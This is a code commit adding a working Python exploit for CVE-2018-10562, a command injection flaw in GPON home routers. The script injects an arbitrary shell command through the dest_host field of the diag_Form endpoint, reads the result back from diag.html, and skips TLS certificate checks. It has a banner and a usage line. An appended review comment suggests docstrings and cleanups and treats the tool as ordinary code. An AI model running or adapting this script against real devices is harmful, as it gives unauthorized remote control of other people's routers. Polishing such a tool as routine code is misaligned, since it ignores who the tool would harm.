

Commit 3bddb2c

authored
Add files via upload
First commit
1 parent 7fdeb0d commit 3bddb2c

1 file changed

Lines changed: 77 additions & 0 deletions


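--- a/gpon_rce.py.py
+++ b/gpon_rce.py.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python
+
+import sys
+import requests
+import time
+import urllib2
+import re
+import ssl
+
+ctx = ssl.create_default_context()
+ctx.check_hostname = False
+ctx.verify_mode = ssl.CERT_NONE
+
+
+def banner():
+ascii_art = """
+
+________________________________________________________________
+
+[*] GPON Remote Code Execution (CVE-2018-10562) [*]
+________________________________________________________________
+
+Coded by F3D
+Twitter: @f3d_0x0
+Medium: medium.com/@0xf3d
+________________________________________________________________
+
+"""
+print ascii_art
+
+def retrieve_results(target, command):
+try:
+fp = urllib2.urlopen(target + '/diag.html?images/', context=ctx)
+for line in fp.readlines():
+if 'diag_result = \"Can\'t resolv hostname for' in line:
+start = '['
+end = ';' + command +']'
+res = str(line[line.find(start)+len(start):line.rfind(end)])
+return res.replace('\\n', '\n')
+except Exception as e:
+print "[DEBUG] " + str(e) + '\n'
+print "[*] An error occured while retriving the result"
+
+def send_command(url_bypass, payload):
+print "[*] Injecting command.."
+try:
+req = requests.Request('POST', url_bypass, data=payload)
+prepared = req.prepare()
+s = requests.Session()
+s.send(prepared)
+except Exception as e:
+pass
+
+
+if __name__ == "__main__":
+try:
+
+banner()
+
+domain = sys.argv[1]
+command = sys.argv[2]
+
+url_bypass = domain + '/GponForm/diag_Form?images/'
+payload = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`' + command + '`;' + command + '&ipv=0'
+send_command(url_bypass, payload)
+print "[*] Waiting for results..zZz.."
+time.sleep(3)
+print "[*] Getting the results.."
+out = retrieve_results(domain, command)
+print ""
+print out
+print ""
+
+except Exception as e:
+print "[DEBUG] " + str(e) + '\n'
+print "[ERROR] Usage: python gpon_rce.py TARGET_URL COMMAND"
+print "[ERROR] e.g. : python gpon_rce.py http://192.168.1.15 \'id\'\n"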
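Review bot: The script has no module docstring or comments, so the two requests it makes and the module-wide `ctx` that sets `check_hostname = False` and `verify_mode = ssl.CERT_NONE` are left unexplained. I would add a header docstring stating that it issues a POST to `/GponForm/diag_Form?images/` with the command placed in `dest_host` between backticks, then a GET of `/diag.html?images/` after a 3-second wait; that pair is also what a defender would look for in web or proxy logs of an affected device. Next to the `ctx` lines a comment such as `# certificate and hostname checks are off for the diag.html fetch, so its response is unauthenticated` would record the trade-off. Two smaller points: `import re` is never used, and the file is committed as `gpon_rce.py.py` while the usage text names `gpon_rce.py`.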
